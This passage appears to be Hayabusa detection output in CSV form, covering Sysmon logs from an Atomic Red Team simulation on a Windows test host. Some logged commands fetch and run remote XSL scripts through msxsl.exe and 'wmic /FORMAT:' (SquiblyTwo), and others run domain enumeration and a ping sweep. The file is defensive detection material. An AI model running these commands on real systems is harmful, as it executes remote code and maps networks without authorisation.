Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process 
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view 
/domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:38.517 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.520 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 